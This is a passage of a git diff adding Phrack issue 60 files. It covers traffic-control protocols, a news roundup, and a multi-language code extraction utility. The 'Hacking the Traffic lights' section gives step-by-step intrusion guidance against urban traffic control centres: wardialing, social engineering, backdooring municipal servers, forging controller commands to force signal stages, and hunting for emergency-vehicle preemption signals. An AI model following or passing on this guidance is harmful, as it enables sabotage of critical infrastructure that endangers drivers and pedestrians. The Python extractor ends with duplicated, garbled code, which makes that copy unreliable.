+across the world still use SCOOT capable UTC primarily whereas
+UK is adopting it as standard.
+
+The NTCIP stack:
+
+Layer           Class A         Class B         Class C
+-------------------------------------------------------------
+Application (7) SNMP/STMP       SNMP/STMP       SNMP/STMP/FTP
+Presentation (6) -              -               -
+Session (5)      -              -               -
+Transport (4)   UDP             -               TCP/UDP
+Network (3)     IP              Null            IP
+Data Link (2)   HDLC            HDLC            HDLC
+Physical (1)    RS232/FSK       RS232/FSK       RS232/FSK
+
+A and C are not standard but could be used. For
+tcp compatibility and routing.
+A and C can be implemented as well as additional TCP/IP stacks.
+
+B is defined as standard and is used for bandwidth efficient exchange of
+data but does not provide assurance of delivery, this is in turn done
+by the physical layer for necessary retransmission.
+
+B only contains three layers, application, data link, physical layer.
+This is because the constant line between office and controller is fixed
+and thus no routing is necessary and SNMP includes the session features.
+
+NTCIP and SNMP and some STMP:
+
+SNMP commands:
+-get
+-set
+-get Next/get Bulk
+-trap
+
+The manager (ATC) may send out 'get' command to retrieve information from
+the agent (CONTROLLER) and waits for a reply. But SNMP does not provide
+for the agent to initiate contact, and thus the manager polls periodically
+with the 'trap' command. This is done on a per second basis.
+
+The typical SNMP frame is 37 Bytes
+----------------------------------------------------------------------------
+|ver|community|command|req id|error status|error index|objct id|objct value|
+----------------------------------------------------------------------------
+
+ver=
+      SNMP v1 -NTCIP v2 included security features which they thought
+      was a waste of bandwidth- ;)
+
+Id flag=
+      is used for matching up the messages with replies
+
+community name=
+      essentially a password
+
+core message in Object ID and Value=
+      the controller control data and reply section
+
+SNMP is a bandwidth eating protocol, so they designed the STMP
+(simple transportation management protocol) which is a cut down vers of SNMP.
+It uses the same commands but has the added benefit of having no header and
+using dynamic objects. Dynamic objects can encompass a number of variables
+like time, date, year and all in one object. The objects are defined online
+and both the instation and outstation parties know what the object describes
+and thus just a single value needs to be transmitted. The typical size of
+an STMP message is 1 byte, with a maximum of 13 dynamic objects.
+
+
+Comparison Between UTC and NTCIP Messaging
+--------------------------------------------
+                        UK UTC          NTCIP Class B
+Polling cycle           1s              1s
+Message size            Fixed           Variable
+Device Variables
+transmitted             All             Only parameters to be changed
+Value of device
+variable                Bit             Integer or Bit
+Protocols               Proprietary     Standardized
+
+
+
+-----------------------------------------------
+Hacking the Traffic lights GOdDamnit! #$@#%@#%
+-----------------------------------------------
+
+Ok I wanna save the environment now, with my new UhbEr
+technique.
+
+Basically, the idea is to get access to the VAX/VMS database or the controlling
+computer itself. Now since this is on a internal LAN, and runs on DECnet
+we have to find clever ideas to get in.
+
+Some social engineering can help you a whole lot.
+Phone your local municipality, or check out websites, newspapers or
+anywhere, where specifically, the ATC is situated. Now you will get the contact
+numbers of people who work there or such, maybe a fault reporting number.
+Fire up your wardialer and start scanning the prefix. They should have
+a server where they dialup to commission a new controller or when a new
+software d/l is needed in the field. In South Africa this is a computer
+running DOS with pc-anywhere on. But if they are clever, like all of the
+centers I've seen, they would have a dial-back facility, if not, your in luck
+cause then you are directly linked to the internal LAN, and should start
+hacking the VAX or FEP. The FEP note, is normally a propriety system, like
+in South Africa, runs on DOS with some major serial comms protocols. Better
+the get access to the VAX/OS2 controlling computer for a more familiar
+system, although the FEP has more control of controller system messages.
+And you can access the serial connections to the modems directly.
+
+If you are unlucky and have a clever ATC. You must devise another means of
+access to the internal LAN. In my experience the LAN is always connected to
+the local municipality WAN for mail purposes and for access to the local
+intranet for database driven fault reporting. Now to gain access to the local
+WAN is not that difficult, since they are usually very big and provide
+gazillion services like websites, mail servers for municipal workers and such.
+Now Hax0r a web server or something and backdoor it *VERY* *VERY* well. You
+gonna need it a lot, maybe backdoor a couple. :)
+
+Now on the local WAN, you can probably access the nameserver to the ATC LAN
+or you can access it directly. I'm not providing a tutorial on hacking, just
+means of access, so sniff email, network traffic blah blah... till you get
+access to the VAX or controlling computer.
+
+Now once your in, backdoor it *VERY* *VERY* *VERY* well ;)
+you should use all the vax hiding tools and shit, look thru phrack for VAX/VMS
+hacking. There are a couple of nice SHOW USER hiding tools and stuff 
+written by mentor and a few others. And once you are in, check
+what is on the DECnet, and maybe see if it is linked to other ATC's.
+From here you can access the controlling computers, FEP's and everything.
+Try to see the serial connections directly via FEP or see the communication
+from the controlling computer, so you can figure out the format of messaging
+controllers. Or if you are lucky, you can access the program itself 
+used for messaging, if its terminal friendly.
+
+Now find a controller that you have the location for, the addresses are
+pretty easy to figure out most of the time or just browse through the
+VAX database of fault reports or check the local intranet. Now construct
+a suitable message and datagram from captured data, and make it do something
+noticeable like:   UTC message - PX    DEMAND PEDESTRIAN STAGE
+Hopefully, you have a laptop or something, go down to the controller
+that you intend to send the message to. Now you will notice that all this is
+done over tcp/ip, since you link to the LAN where you get onto the VAX/VMS
+DECnet and in turn the controlling computer/FEP. So send through the command
+and watch if the controller obeys you. If it does then you can start script
+the whole procedure ;). make nice timings for ENVIROMENTLY friendly travels
+between destination A and B. Also the commands to force a stage is nice to
+have, UTC message - Fn  ; now if your stuck behind a red light, and just
+sitting there polluting the air, just force to next stage in stream, and
+off you go without the guilt of crossing a red light ;)
+
+Also if you are browsing the LAN, look out for nifty info like, the source
+to the firmware of controllers since the firmware gets updated quite often.
+It might lay around on the dialup server or some internal ftp server.
+The exact frequency and bit sequence used to initiate the emergency cycle
+in the controllers, for ambulances and emergency vehicles is also nice. 
+There is also the software that is used to commission the controllers 
+and the hand unit for field monitoring.  
+
+Of course hacking the traffic system can be abjo0zed and have disastrous 
+effects, but i feel, if you have the skill to access a system like that, 
+then you have the sense not to fsck it up.
+
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack60/15.txt b/phrack60/15.txt
new file mode 100644
index 0000000..bf1c3c6
--- /dev/null
+++ b/phrack60/15.txt
@@ -0,0 +1,231 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3c, Phile #0x0f of 0x10
+
+|=----------------=[ P H R A C K  W O R L D  N E W S ]=------------------=|
+|=-----------------------------------------------------------------------=|
+|=---------------------------=[ phrackstaff ]=---------------------------=|
+
+
+Content in Phrack World News does not reflect the opinion of any particluar
+Phrack Staff member.  PWN is exclusively done by the scene and for the
+scene.
+
+  0x01: Phrack Headlines & Misc
+  0x02: Freedom strikes back - DMCA loses the trial
+  0x03: MS issues 71 security bulletins this year and counting...
+  0x04: U.S. Patriot Act
+
+|=[ 0x01 - Phrack Headlines & Misc ]=------------------------------------=|
+
+Video games with violent content are good for da kids! I KNEW IT!
+http://www.vnunet.com/News/1135410
+
+The News Media propose to not broadcast (i.e. to censor) certain
+reports. The 'Free' media is turning (some say it already turned) into an
+instrument of the military. But dont worry too much about it: It's all
+for our good!
+http://commondreams.org/views02/1218-01.htm
+
+Join the teleconference with the National infrastructure and Advisory
+Council. The Council advises the President of the United States on the
+security of information systems for critical infrastructure supporting
+other sectors of the economy, including banking and finance,
+transportation, energy, manufacturing, and emergency government services.
+At this meeting, the Council will continue its deliberations on comments
+to be delivered to President Bush concerning the draft National Strategy
+to Secure Cyberspace.
+http://www.access.gpo.gov/su_docs/aces/fr-cont.html
+
+The promise of the newly formed Department of Homeland Security is to
+improve our nation's security from terrorism. Unfortunately, the results
+are far more likely to be the opposite.
+http://www.counterpane.com/crypto-gram-0212.html#3
+
+Kevin Mitnick wrote a book, "The Art of Deception". The first chapter
+has been deleted by the publisher at the last minute. It's available
+on the internet:
+http://www.wired.com/news/culture/0,1284,56187,00.html
+http://littlegreenguy.fateback.com/chapter1/Chapter%201%20-%20Banned%20Edition.doc
+
+Cyberterrorism is just media hype. It's yet another trick used by the
+military-industrial complex to suck the last cent out of your pocket. The
+world will not forget when the Pentagon announced the "best coordinated and
+most serious hacker attack against military installations". In the end it
+was one single script kid who tried a public exploit against some
+unimportant and unclassified military computer and gained access due to a 2
+year old bug.
+http://www.wired.com/news/infostructure/0,1377,56935,00.html
+
+Read this before you visit any other countries. Otherwise you may
+get arrested and prosecuted (in some cases executed!) in a foreign country
+for an activity that is _legal_ in your country:
+
+Flashn, a (famous) swedish hacker recently got arrested while trying to
+escape the United States border to Canada. It seems that he had stayed
+too long on his tourist visa.
+http://www.freeflashn.org/
+http://www.mail-archive.com/full-disclosure@lists.netsys.com/msg01684.html
+
+Sk8 is out of prison but not free yet:
+http://www.freesk8.org/
+
+'Analyzer' is back in jail again:
+http://www.freeanalyzer.org/
+
+'Out of office' mails are fucking annoying. Read about yet another
+reasons why you don't want to use them:
+http://abcnews.go.com/sections/scitech/DailyNews/burglary021219.html
+
+Computer Crime Center opens:
+http://www.thestate.com/mld/thestate/news/local/4763628.htm
+
+Get rooted while listening to mp3's:
+http://news.com.com/2100-1001-978403.html?tag=fd_top
+
+Microsoft's products have been left off a list compiled by the Defence
+Signals Directorate that aims to evaluate and advise whether software
+is appropriate for use by Australian Government agencies.
+http://www.zdnet.com.au/newstech/security/story/0,2000024985,20270727,00.htm
+
+
+|=[ 0x02 - Freedom strikes back - DMCA loses the trial  ]=----------------=|
+
+The Russian software company which had found itself on trial in an
+American court was acquitted on all counts of circumventing the DMCA.
+
+Elcomsoft's woes began in August of last year, when programmer Dmitry
+Sklyarov was charged under the Digital Millennium Copyright Act's
+circumvention 1201 clauses (one small part of which is under review by
+the Librarian of Congress) while visiting Las Vegas for a technical
+conference. Skylarov was imprisoned for his part in creating an Adobe
+eBook reader that permitted fair-use of copyright material, and
+imprisoned pending trial.
+
+"Today's jury verdict sends a strong message to federal prosecutors
+who believe that tool makers should be thrown in jail just because a
+copyright owner doesn't like the tools they build," said EFF Senior
+Intellectual Property Attorney Fred von Lohmann.
+
+http://www.theregister.co.uk/content/55/28612.html
+http://www.theregister.co.uk/content/6/28654.html
+http://www.phrack-dont-give-a-shit-about-dmca.org
+http://www.nytimes.com/2002/11/21/technology/21COPY.html
+http://www.theregister.co.uk/content/6/28223.html
+http://www.wired.com/news/business/0,1367,56504,00.html
+http://www.fatwallet.com/forums/messageview.cfm?catid=18&threadid=126042
+http://news.com.com/2100-1023-976296.html
+
+
+|=[ 0x03 - MS issues 71 security bulletins this year and counting...  ]=-=|
+
+Are you keeping up with all the patches Microsoft has issued?
+Microsoft has issued 71 security bulletins so far this year. One
+bulletin in particular, MS02-069 (Flaw in Microsoft VM Could Enable
+System Compromise) issued December 11, addresses several problems with
+the Microsoft Virtual Machine (VM) used for Java code. Versions of the
+VM software through version 5.0.3805 are vulnerable. According to
+Microsoft, "The most serious of these issues could enable a Web site
+to compromise your system and take actions such as changing data,
+loading and running programs, and reformatting the hard disk." The
+patch is a critical update, and everyone should install it.
+
+http://www.microsoft.com/security/security_bulletins/ms02-069.asp
+
+
+|=[ 0x04  - U.S Patriot Act ]=-------------------------------------------=|
+
+by, Ross Regnart
+
+Patriot Act redefine MAFIA and Others as "Terrorist Associates"
+
+    Under the Patriot Act the U.S. Government can use a "new charge" to
+arrest Mob members. The Act redefined "Terrorist Association" as any
+criminal activity that may "relate" to supporting terrorists.
+
+    For Prosecution, the U.S. Patriot Act merged common criminal activity
+with supporting terrorism: The ACT states: criminals and terrorists use the
+same criminal networks and organizations to "Market" illegal-drugs; both
+participate in and have an interest in world criminal activity." 
+
+    Police Can Now Use Secret Evidence Against Anyone: The Act opened a
+back door for police to use "secret evidence" against non-terrorists and
+alleged criminals. Secret evidence are evidence that has been gathers in
+an illegal manner, without the authorization of a judge by federal
+agencies. Government need only allege an individual or organization's
+activities "relate" to a "criminal market that terrorists use or depend on
+for their support in order to cause an arrest and/or property confiscation.
+
+    What is a "Terrorist Associate? The Patriot Act's wording "relate to"
+"join" "influence on" "assist" "support" and "criminal market" are so
+vague, government may charge as "Terrorist Associates" both legal and
+illegal businesses and individuals who never intended to support
+terrorists. It is foreseeable "illegal drug marketers" will be charged as
+"Terrorist Associates" since it is appears impossible to stop terrorists
+from using their networks to sell drugs or other criminal activity. Under
+the Act police need little probable cause to arrest citizens and only a
+"preponderance of evidence" to confiscate their property. Innocent citizens
+may find it difficult to defend against  "secret evidence" and/or recover
+their confiscated bank accounts and other property. Under the Act
+"a government authority" to seize foreign bank accounts, need only claim
+that a  financial transaction, account proceeds or property are "related"
+to criminal activity. 
+
+    Under the Patriot Act: U.S. and  cooperating government authorities are
+not required to "trace" prove the  source of a foreign bank or financial
+service account in order to seize all the proceeds therein. Should the
+United States or a government authority find that a  foreign bank account
+has been drawn down or closed  the government may "substitute for
+forfeiture" any other  asset  a government claims to belong to the alleged
+owner of a bank account then subject to forfeiture. Consequently, a
+government may  "substitute for forfeiture" assets "equal" to the entire
+amount of all financial transactions and deposits that went through a
+foreign bank or financial service account during a given time period. 
+
+    Under the Patriot Act: the U.S. or a cooperating government authority
+is not required to prove what part of proceeds seized from a foreign bank
+or service account  are "related" to criminal activity. The U.S. or a 
+cooperating government authority may confiscate a foreign bank account and
+"never" inform its owners the reason for confiscation or  the evidence
+against their account that caused its confiscation. Innocent account owners
+may be defenseless under such circumstances.
+
+    Charged Defendants Under the Act start out guilty having to prove they
+did not reasonably have reason to know the person(s), organization or
+entity they associated or networked with had committed a terrorist act or
+would commit one in the future. 
+
+    What constitutes Terrorism under the Patriot Act may be arbitrarily
+decided by police: Any physical act that is legal or illegal may be alleged
+by police to be terrorism under 18USC 2331. Example: Union demonstrators
+fighting with strike breakers. No one need be injured for police to make a
+terrorist charge; demonstrators need only "appear intended to intimidate or
+coerce a civilian population; or to influence the policy of a government".
+(See 18 USC 2331). 
+
+   The Act's mention of "related" criminal activity and networks permit
+government under the Act's anti-terrorism provisions to use "secret
+evidence" against non-terrorists the government charges with being
+"Terrorist Associates". Government "secret evidence" can be used in both
+U.S. Military Tribunals and Civilian "Star Chamber Courts" as provided for
+by the Anti-Terrorism and Death Penalty Act of 1996. Defense against
+government-paid and/or other secret witnesses may be difficult when
+defendants are not allowed to learn the evidence against them. 
+
+    Under the U.S. Patriot Act the Government got the power from Congress
+to charge U.S. Citizens for crimes that "relate" to any activity that may
+support terrorists or threatens the safety, economy, national security,
+and/or U.S. or Foreign Policy of the United States. 
+
+
+    CONCERN: Like imprisoned foreign-terrorist suspects in the U.S., could
+American Citizens (non-terrorists) subsequently charged by the government
+as "Terrorist Associates", e.g., "related criminal activity" be next to
+lose their right to have confidential meetings with attorneys? Could U.S.
+Citizens be forced to give up attorney-client-privilege, endure government
+agents sitting at their table whenever an attorney comes to meet with them
+in jail? 
+
+
+|=[ EO PWN ]=------------------------------------------------------------=|
+
diff --git a/phrack60/16.txt b/phrack60/16.txt
new file mode 100644
index 0000000..0278d02
--- /dev/null
+++ b/phrack60/16.txt
@@ -0,0 +1,754 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3c, Phile #0x10 of 0x10
+
+|=--------=[ P H R A C K   E X T R A C T I O N   U T I L I T Y ]=--------=|
+|=-----------------------------------------------------------------------=|
+|=--------------------------=[ phrackstaff ]=----------------------------=|
+
+The Phrack Magazine Extraction Utility, first appearing in P50, is a
+convenient way to extract code from textual ASCII articles.  It preserves
+readability and 7-bit clean ASCII codes.  As long as there are no
+extraneous "<++>" or <-->" in the article, everything runs swimmingly.
+
+Source and precompiled version (windows, unix, ...) is available at
+http://www.phrack.org/misc.
+
+|=-----------------------------------------------------------------------=|
+
+<++> extract/extract4.c !8e2bebc6
+
+/*
+ *  extract.c by Phrack Staff and sirsyko
+ *
+ *  Copyright (c) 1997 - 2000 Phrack Magazine
+ *
+ *  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ *
+ *  extract.c
+ *  Extracts textfiles from a specially tagged flatfile into a hierarchical 
+ *  directory structure.  Use to extract source code from any of the articles 
+ *  in Phrack Magazine (first appeared in Phrack 50).
+ *
+ *  Extraction tags are of the form:
+ *
+ *  host:~> cat testfile
+ *  irrelevant file contents
+ *  <++> path_and_filename1 !CRC32
+ *  file contents
+ *  <-->
+ *  irrelevant file contents
+ *  <++> path_and_filename2 !CRC32
+ *  file contents
+ *  <-->
+ *  irrelevant file contents
+ *  <++> path_and_filenamen !CRC32
+ *  file contents
+ *  <-->
+ *  irrelevant file contents
+ *  EOF
+ *
+ *  The `!CRC` is optional.  The filename is not.  To generate crc32 values 
+ *  for your files, simply give them a dummy value initially.  The program
+ *  will attempt to verify the crc and fail, dumping the expected crc value.
+ *  Use that one.  i.e.:
+ *
+ *  host:~> cat testfile
+ *  this text is ignored by the program
+ *  <++> testarooni !12345678
+ *  text to extract into a file named testarooni
+ *  as is this text
+ *  <--> 
+ *
+ *  host:~> ./extract testfile
+ *  Opened testfile
+ *   - Extracting testarooni
+ *   crc32 failed (12345678 != 4a298f18)
+ *  Extracted 1 file(s).  
+ *
+ *  You would use `4a298f18` as your crc value.
+ *
+ *  Compilation:
+ *  gcc -o extract extract.c
+ *  
+ *  ./extract file1 file2 ... filen
+ */
+
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <string.h>
+#include <dirent.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <errno.h>
+
+#define VERSION         "7niner.20000430 revsion q"
+
+#define BEGIN_TAG       "<++> "
+#define END_TAG         "<-->"
+#define BT_SIZE         strlen(BEGIN_TAG)
+#define ET_SIZE         strlen(END_TAG)
+#define EX_DO_CHECKS    0x01
+#define EX_QUIET        0x02
+
+struct f_name
+{
+    u_char name[256];
+    struct f_name *next;
+};
+
+unsigned long crcTable[256];
+
+
+void crcgen() 
+{
+    unsigned long crc, poly;
+    int i, j;
+    poly = 0xEDB88320L;
+    for (i = 0; i < 256; i++)
+    {
+        crc = i;
+        for (j = 8; j > 0; j--)
+        {
+            if (crc & 1)
+            {
+                crc = (crc >> 1) ^ poly;
+            } 
+            else
+            {
+                crc >>= 1;
+            }
+        }
+        crcTable[i] = crc;
+    }
+}
+
+        
+unsigned long check_crc(FILE *fp)
+{
+    register unsigned long crc;
+    int c;
+
+    crc = 0xFFFFFFFF;
+    while( (c = getc(fp)) != EOF )
+    {
+         crc = ((crc >> 8) & 0x00FFFFFF) ^ crcTable[(crc ^ c) & 0xFF];
+    }
+ 
+    if (fseek(fp, 0, SEEK_SET) == -1)
+    {
+        perror("fseek");
+        exit(EXIT_FAILURE);
+    }
+
+    return (crc ^ 0xFFFFFFFF);
+}
+
+
+int
+main(int argc, char **argv)
+{ 
+    char *name;
+    u_char b[256], *bp, *fn, flags;
+    int i, j = 0, h_c = 0, c;
+    unsigned long crc = 0, crc_f = 0;
+    FILE *in_p, *out_p = NULL;
+    struct f_name *fn_p = NULL, *head = NULL, *tmp = NULL;
+
+    while ((c = getopt(argc, argv, "cqv")) != EOF)
+    {
+        switch (c)
+        {
+            case 'c':
+                flags |= EX_DO_CHECKS;
+                break;
+            case 'q':
+                flags |= EX_QUIET;
+                break;
+            case 'v':
+                fprintf(stderr, "Extract version: %s\n", VERSION);
+                exit(EXIT_SUCCESS);
+        }
+    }
+    c = argc - optind;
+
+    if (c < 2)
+    {
+        fprintf(stderr, "Usage: %s [-cqv] file1 file2 ... filen\n", argv[0]);
+        exit(0); 
+    }
+
+    /*
+     *  Fill the f_name list with all the files on the commandline (ignoring
+     *  argv[0] which is this executable).  This includes globs.
+     */
+    for (i = 1; (fn = argv[i++]); )
+    {
+        if (!head)
+        {
+            if (!(head = (struct f_name *)malloc(sizeof(struct f_name))))
+            {
+                perror("malloc");
+                exit(EXIT_FAILURE);
+            }
+            strncpy(head->name, fn, sizeof(head->name));
+            head->next = NULL;
+            fn_p = head;
+        }
+        else
+        {
+            if (!(fn_p->next = (struct f_name *)malloc(sizeof(struct f_name))))
+            {
+                perror("malloc");
+                exit(EXIT_FAILURE);
+            }
+            fn_p = fn_p->next;
+            strncpy(fn_p->name, fn, sizeof(fn_p->name));
+            fn_p->next = NULL;
+        }
+    }
+    /*
+     *  Sentry node.
+     */
+    if (!(fn_p->next = (struct f_name *)malloc(sizeof(struct f_name))))
+    {
+        perror("malloc");
+        exit(EXIT_FAILURE);
+     }
+    fn_p = fn_p->next;
+    fn_p->next = NULL;
+
+    /*
+     *  Check each file in the f_name list for extraction tags.
+     */
+    for (fn_p = head; fn_p->next; )
+    {
+        if (!strcmp(fn_p->name, "-"))
+        {
+            in_p = stdin;
+            name = "stdin";
+        }
+        else if (!(in_p = fopen(fn_p->name, "r")))
+        {
+            fprintf(stderr, "Could not open input file %s.\n", fn_p->name);
+            fn_p = fn_p->next;
+	    continue;
+        }
+        else
+        {
+            name = fn_p->name;
+        }
+
+        if (!(flags & EX_QUIET))
+        {
+            fprintf(stderr, "Scanning %s...\n", fn_p->name);
+        }
+        crcgen();
+        while (fgets(b, 256, in_p))
+        { 
+            if (!strncmp(b, BEGIN_TAG, BT_SIZE))
+            {
+	        b[strlen(b) - 1] = 0;           /* Now we have a string. */
+                j++;
+
+                crc = 0;
+                crc_f = 0;
+                if ((bp = strchr(b + BT_SIZE + 1, '/')))
+                {
+                    while (bp)
+                    {
+		        *bp = 0;
+                        if (mkdir(b + BT_SIZE, 0700) == -1 && errno != EEXIST)
+                        {
+                            perror("mkdir");
+                            exit(EXIT_FAILURE);
+                        }
+                        *bp = '/';
+		        bp = strchr(bp + 1, '/'); 
+		    }
+                }
+
+                if ((bp = strchr(b, '!')))
+                {
+                    crc_f = 
+                        strtoul((b + (strlen(b) - strlen(bp)) + 1), NULL, 16);
+                   b[strlen(b) - strlen(bp) - 1 ] = 0;
+                   h_c = 1;
+                }
+                else
+                {
+                    h_c = 0;
+                }
+                if ((out_p = fopen(b + BT_SIZE, "wb+")))
+                {
+                    fprintf(stderr, ". Extracting %s\n", b + BT_SIZE);
+                }
+                else
+                {
+        	    printf(". Could not extract anything from '%s'.\n",
+                        b + BT_SIZE);
+        	    continue;
+                }
+            }
+            else if (!strncmp (b, END_TAG, ET_SIZE))
+            {
+                if (out_p)
+                {
+                    if (h_c == 1)
+                    {
+                        if (fseek(out_p, 0l, 0) == -1)
+                        {
+                            perror("fseek");
+                            exit(EXIT_FAILURE);
+                        }
+                        crc = check_crc(out_p);
+                        if (crc == crc_f && !(flags & EX_QUIET))
+                        {
+                            fprintf(stderr, ". CRC32 verified (%08lx)\n", crc);
+                        }
+                        else
+                        {
+                            if (!(flags & EX_QUIET))
+                            {
+                                fprintf(stderr, ". CRC32 failed (%08lx != %08lx)\n",
+                                        crc_f, crc);
+                            }
+                        }
+                    }
+                    fclose(out_p);
+                }
+	        else
+                {
+	            fprintf(stderr, ". `%s` had bad tags.\n", fn_p->name);
+		    continue;
+	        }
+            }
+            else if (out_p)
+            {
+                fputs(b, out_p);
+            }
+        }
+        if (in_p != stdin)
+        {
+            fclose(in_p);
+        }
+        tmp = fn_p;
+        fn_p = fn_p->next;
+        free(tmp);
+    }
+    if (!j)
+    {
+        printf("No extraction tags found in list.\n");
+    }
+    else
+    {
+        printf("Extracted %d file(s).\n", j);
+    }
+    return (0);
+}
+/* EOF */
+<-->
+<++> extract/extract.pl !1a19d427
+# Daos <daos@nym.alias.net>
+#!/bin/sh -- # -*- perl -*- -n
+eval 'exec perl $0 -S ${1+"$@"}' if 0;
+
+$opening=0;
+
+if (/^\<\+\+\>/) {$curfile = substr($_ , 5); $opening=1;};
+if (/^\<\-\-\>/) {close ct_ex; $opened=0;}; 
+if ($opening) {                        
+        chop $curfile;                 
+        $sex_dir= substr( $curfile, 0, ((rindex($curfile,'/'))) ) if ($curfile =~ m/\//);
+        eval {mkdir $sex_dir, "0777";}; 
+        open(ct_ex,">$curfile"); 
+        print "Attempting extraction of $curfile\n";
+        $opened=1; 
+}
+if ($opened && !$opening) {print ct_ex $_}; 
+<-->
+
+<++> extract/extract.awk !26522c51
+#!/usr/bin/awk -f
+#
+# Yet Another Extraction Script
+# - <sirsyko>
+#
+/^\<\+\+\>/ {
+        ind = 1
+        File = $2
+        split ($2, dirs, "/")
+        Dir="."
+        while ( dirs[ind+1] ) {
+                Dir=Dir"/"dirs[ind]
+                system ("mkdir " Dir" 2>/dev/null")
+                ++ind
+        }
+        next
+}
+/^\<\-\-\>/ {
+        File = ""
+        next
+}
+File { print >> File }
+<-->
+<++> extract/extract.sh !a81a2320
+#!/bin/sh
+# exctract.sh : Written 9/2/1997 for the Phrack Staff by <sirsyko>
+#
+# note, this file will create all directories relative to the current directory
+# originally a bug, I've now upgraded it to a feature since I dont want to deal
+# with the leading / (besides, you dont want hackers giving you full pathnames
+# anyway, now do you :)
+# Hopefully this will demonstrate another useful aspect of IFS other than 
+# haxoring rewt
+#
+# Usage: ./extract.sh <filename>
+
+cat $* | (
+Working=1
+while [ $Working ];
+do
+        OLDIFS1="$IFS"
+        IFS=
+        if read Line; then
+                IFS="$OLDIFS1"
+                set -- $Line
+                case "$1" in
+                "<++>") OLDIFS2="$IFS"
+                        IFS=/
+                        set -- $2
+                        IFS="$OLDIFS2"
+                        while [ $# -gt 1 ]; do
+                                File=${File:-"."}/$1
+                                if [ ! -d $File ]; then
+                                        echo "Making dir $File"
+                                        mkdir $File
+                                fi
+                                shift
+                        done                               
+                        File=${File:-"."}/$1
+                        echo "Storing data in $File"
+                ;;
+                "<-->") if [ "x$File" != "x" ]; then
+                                unset File
+                        fi ;;
+                *)      if [ "x$File" != "x" ]; then
+                                        IFS=
+                                        echo "$Line" >> $File
+                                        IFS="$OLDIFS1"
+                        fi
+                ;;
+                esac
+                IFS="$OLDIFS1"
+        else
+                echo "End of file"
+                unset Working
+        fi
+done
+)                                                                    
+<-->
+<++> extract/extract.py !83f65f60
+#! /bin/env python
+# extract.py    Timmy 2tone <_spoon_@usa.net>
+
+import sys, string, getopt, os
+
+class Datasink:
+    """Looks like a file, but doesn't do anything."""
+    def write(self, data): pass
+    def close(self): pass
+
+def extract(input, verbose = 1):
+    """Read a file from input until we find the end token."""
+
+    if type(input) == type('string'):
+        fname = input
+        try: input = open(fname)
+        except IOError, (errno, why):
+            print "Can't open %s: %s" % (fname, why)
+            return errno
+    else:
+        fname = '<file descriptor %d>' % input.fileno()
+
+    inside_embedded_file = 0
+    linecount = 0
+    line = input.readline()
+    while line:
+
+        if not inside_embedded_file and line[:4] == '<++>':
+
+            inside_embedded_file = 1
+            linecount = 0
+
+            filename = string.strip(line[4:])
+            if mkdirs_if_any(filename) != 0:
+                pass
+
+            try: output = open(filename, 'w')
+            except IOError, (errno, why):
+                print "Can't open %s: %s; skipping file" % (filename, why)
+                output = Datasink()
+                continue
+
+            if verbose:
+                print 'Extracting embedded file %s from %s...' % (filename,
+                                                                  fname),
+
+        elif inside_embedded_file and line[:4] == '<-->':
+            output.close()
+            inside_embedded_file = 0
+            if verbose and not isinstance(output, Datasink):
+                print '[%d lines]' % linecount
+
+        elif inside_embedded_file:
+            output.write(line)
+
+        # Else keep looking for a start token.
+        line = input.readline()
+        linecount = linecount + 1
+
+def mkdirs_if_any(filename, verbose = 1):
+    """Check for existance of /'s in filename, and make directories."""
+
+    path, file = os.path.split(filename)
+    if not path: return
+
+    errno = 0
+    start = os.getcwd()
+    components = string.split(path, os.sep)
+    for dir in components:
+        if not os.path.exists(dir):
+            try:
+                os.mkdir(dir)
+                if verbose: print 'Created directory', path
+
+            except os.error, (errno, why):
+                print "Can't make directory %s: %s" % (dir, why)
+                break
+
+        try: os.chdir(dir)
+        except os.error, (errno, why):
+            print "Can't cd to directory %s: %s" % (dir, why)
+            break
+
+    os.chdir(start)
+    return errno
+
+def usage():
+    """Blah."""
+    die('Usage: extract.py [-V] filename [filename...]')
+
+def main():
+    try: optlist, args = getopt.getopt(sys.argv[1:], 'V')
+    except getopt.error, why: usage()
+    if len(args) <= 0: usage()
+
+    if ('-V', '') in optlist: verbose = 0
+    else: verbose = 1
+
+    for filename in args:
+        if verbose: print 'Opening source file', filename + '...'
+        extract(filename, verbose)
+
+def db(filename = 'P51-11'):
+    """Run this script in the python debugger."""
+    import pdb
+    sys.argv[1:] = ['-v', filename]
+    pdb.run('extract.main()')
+
+def die(msg, errcode = 1):
+    print msg
+    sys.exit(errcode)
+
+if __name__ == '__main__':
+    try: main()
+    except KeyboardInterrupt: pass
+
+
+    except getopt.error, why: usage()
+    if len(args) <= 0: usage()
+
+    if ('-V', '') in optlist: verbose = 0
+    else: verbose = 1
+
+    for filename in args:
+        if verbose: print 'Opening source file', filename + '...'
+        extract(filename, verbose)
+
+def db(filename = 'P51-11'):
+    """Run this script in the python debugger."""
+    import pdb
+    sys.argv[1:] = [filename]
+    pdb.run('extract.main()')
+
